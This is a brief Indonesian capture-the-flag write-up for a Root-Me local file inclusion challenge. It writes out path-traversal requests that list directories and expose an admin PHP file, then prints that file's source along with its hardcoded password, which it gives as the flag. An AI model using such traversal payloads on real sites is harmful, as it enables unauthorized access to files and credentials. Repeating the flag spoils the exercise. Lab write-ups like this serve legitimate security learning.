Soal : http://challenge01.root-me.org/web-serveur/ch16/

	Challenge's Name : Local File Inclusion
	
	Request : Get in the admin section.
	
Solusi : 
	
	Akses url soal http://challenge01.root-me.org/web-serveur/ch16/
	
	Terdapat aplikasi web File viewer v 0.01
	
	Pada soal terdapat request "Get in the admin section" yang artinya kita harus mendapatkan admin page dengan vulneberity LFI (Local file Inclusion)
	
	akses url http://challenge01.root-me.org/web-serveur/ch16/?files=../
	
	Terdapat directory file 
	
	text.gif
	admin
	files
	index.php
	
	kemudian akses folder admin dengan memasukan url 
	
	http://challenge01.root-me.org/web-serveur/ch16/?files=../admin
	
	Terdapat File index.php jika kita click index.php tersebut
	
	http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php
	
	akan menampikan source vile index.php
	
<?php

	function http_digest_parse($txt)
		{
				$needed_parts = array('nonce'=>1, 'nc'=>1, 'cnonce'=>1, 'qop'=>1, 'username'=>1, 'uri'=>1, 'response'=>1);
				$data = array();
				$keys = implode('|', array_keys($needed_parts));
 
				preg_match_all('@(' . $keys . ')=(?:([\'"])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER);

			foreach ($matches as $m) {
				$data[$m[1]] = $m[3] ? $m[3] : $m[4];
				unset($needed_parts[$m[1]]);
			}

			return $needed_parts ? false : $data;
		}


	function auth($realm){
		header('HTTP/1.1 401 Unauthorized');
		header('WWW-Authenticate: Digest realm="'.$realm.'",qop="auth",nonce="'.uniqid().'",opaque="'.md5($realm).'"');
		die($realm);
	}


	$realm = 'PHP Restricted area';
	$users = array('admin' => 'OpbNJ60xYpvAQU8');


	if (empty($_SERVER['PHP_AUTH_DIGEST'])) {
	  auth($realm);
	}

	if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST'])) || !isset($users[$data['username']]))
		auth($realm);


	$A1 = md5($data['username'] . ':' . $realm . ':' . $users[$data['username']]);
	$A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']);
	$valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2);

	if ($data['response'] != $valid_response)
		auth($realm);

	echo "<html>
		<head></head>
		<body>
			<h3>You could use this password to validate the challenge !</h3>
		</body>
		  </html>";

?>

	Lihat pada : 
	$users = array('admin' => 'OpbNJ60xYpvAQU8');
	
	Flag : OpbNJ60xYpvAQU8
	
	
